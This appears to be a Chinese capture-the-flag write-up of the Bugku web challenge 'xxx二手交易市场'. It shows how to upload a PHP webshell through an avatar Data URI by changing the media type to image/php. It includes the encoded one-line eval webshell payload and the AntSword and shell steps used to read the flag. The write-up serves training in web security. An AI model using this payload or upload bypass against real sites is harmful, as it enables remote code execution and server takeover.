Bugku-web题目-xxx二手交易市场

关于bugku题目:xxx二手交易市场,打开题目,先注册一个账号。

随后登录账号

看了一下感觉有头像上传的漏洞点,打开bp,抓取上传头像的那个包

头像上传漏洞点,rce + webshell:

抓包后发现"image=data:image/jpeg;base64,<data>(跟着一大堆乱七八糟编码)"

识别Data URI格式,这就是标准的Data URI 格式:data:[<mediatype>][;base64],<data>

原image/jpeg被替换成image/php,方便植入并执行webshell

payload采用"image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4="(URL参数形式),解码后"image=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4="

在bp的repeater模块中替换并发送了包之后,查看response(响应),可以从data中看到一个路径,使用它返回的路径,在蚁剑中进行连接。

成功进入蚁剑之后,打开虚拟终端,输入"find / -name flag 2>/dev/null"即可找到flag的路径(/var/www/html/flag )

那么此时先将路径回到根目录,"cd /"

再执行"cd /var/www/html"

最后"cat flag"即可得到flag

相关推荐
黑客老李2 小时前
web渗透实战 | js.map文件泄露导致的通杀漏洞
安全·web安全·小程序·黑客入门·渗透测试实战
枷锁—sha10 小时前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
liann11913 小时前
3.1_网络——基础
网络·安全·web安全·http·网络安全
独行soc13 小时前
2026年渗透测试面试题总结-17(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
独行soc13 小时前
2026年渗透测试面试题总结-18(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
ESBK202514 小时前
第四届移动互联网、云计算与信息安全国际会议(MICCIS 2026)二轮征稿启动,诚邀全球学者共赴学术盛宴
大数据·网络·物联网·网络安全·云计算·密码学·信息与通信
旺仔Sec15 小时前
一文带你看懂免费开源 WAF 天花板!雷池 (SafeLine) 部署与实战全解析
web安全·网络安全·开源·waf
七牛云行业应用15 小时前
Moltbook一夜崩盘:150万密钥泄露背后的架构“死穴”与重构实战
网络安全·postgresql·架构·高并发·七牛云
原来是你~呀~16 小时前
Strix:AI驱动的全自动安全测试平台,LinuxOS部署
网络安全·自动化渗透测试·strix
fendouweiqian16 小时前
AWS WAF(配合 CloudFront)基础防护配置:免费能做什么、要不要开日志、如何限制危险方法
网络安全·aws·cloudfront